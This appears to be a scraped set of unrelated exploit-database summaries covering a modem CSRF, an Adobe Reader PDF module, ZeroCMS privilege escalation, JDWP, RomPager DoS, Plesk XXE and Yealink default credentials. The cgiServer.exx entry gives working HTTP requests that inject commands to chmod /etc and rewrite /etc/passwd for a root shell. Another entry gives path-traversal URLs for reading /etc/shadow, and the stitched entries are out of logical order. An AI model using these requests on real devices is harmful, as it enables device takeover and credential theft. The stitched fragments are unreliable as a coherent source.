It was observed that this modem's Web Application, is vulnerable to Cross-site request forgery through which attacker could manipulate user data via sending the victim malicious crafted url. At attacker could change the username,password,dns service and host name of the victim's account without the victim's knowledge.
Adobe Reader versions less than 11.2.0 exposes insecure native interfaces to untrusted javascript in a PDF. This module embeds the browser exploit from android/webview_addjavascriptinterface into a PDF to get a command shell on vulnerable versions of Reader.
ZeroCMS is a very simple Content Management System built using PHP and MySQL. The script zero_transact_user.php contains a Modify Account case where the execution context doen't have in to consideration the current user's permitions allowing a malcious user to escalate its privileges to admin.
Using the fact that cgiServer.exx run under the root privileges we use the command execution (CVE-2013-5758) to modify the system file restriction. Then we add extra privileges to the guest account. Step 1 - Changing /etc folder right to 777: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("/bin/busybox%20chmod%20-R%20777%20/etc") Step 2 - Change guest user uid: POST /cgi-bin/cgiServer.exx HTTP/1.1 Host: 10.0.75.122 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0 system("echo "root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:0:0:Guest,,,:/:/bin/sh" > /etc/passwd"") Step 3 - Connect back using telnet and guest account (password is guest): # id uid=0(root) gid=0(root) Enjoy your root shell :)"
This module exploits a vulnerability in the JDWP protocol, which is used for debugging Java applications. The vulnerability allows an attacker to send malicious packets to the target, which can be used to execute arbitrary code.
Using cgiServer.exx we are able to send OS command using the system function.
Web interface contain a vulnerability that allow any page to be included. We are able to disclose /etc/passwd & /etc/shadow. Using the page parameter (CVE-2013-5756): http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow. Using the command parameter (CVE-2013-5757): http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow") *By viewing the shadow file we are able to conclude that cgiServer.exx run under the root privileges. This lead to CVE-2013-5759.
The web interface of the Yealink VoIP Phone SIP-T38G uses hardcoded default credentials in the /config/.htpasswd file. The cleartext passwords for these accounts are user:user, admin:admin, and var:var.
This exploit is a proof of concept for a denial of service vulnerability in the RomPager web server, which is used in ZTE and TP-Link routers. The exploit sends a specially crafted HTTP request to the router, which causes the router to crash and reboot.
Plesk SSO XXE injection (Old bug) Exploit is a vulnerability in Plesk SSO which allows an attacker to inject malicious XML code into the application. This exploit was discovered by z00 in 2014 and affects versions 11.0.9 and 10.4.4. It allows an attacker to execute arbitrary commands on the server, read files, and access sensitive information.
Services By CQR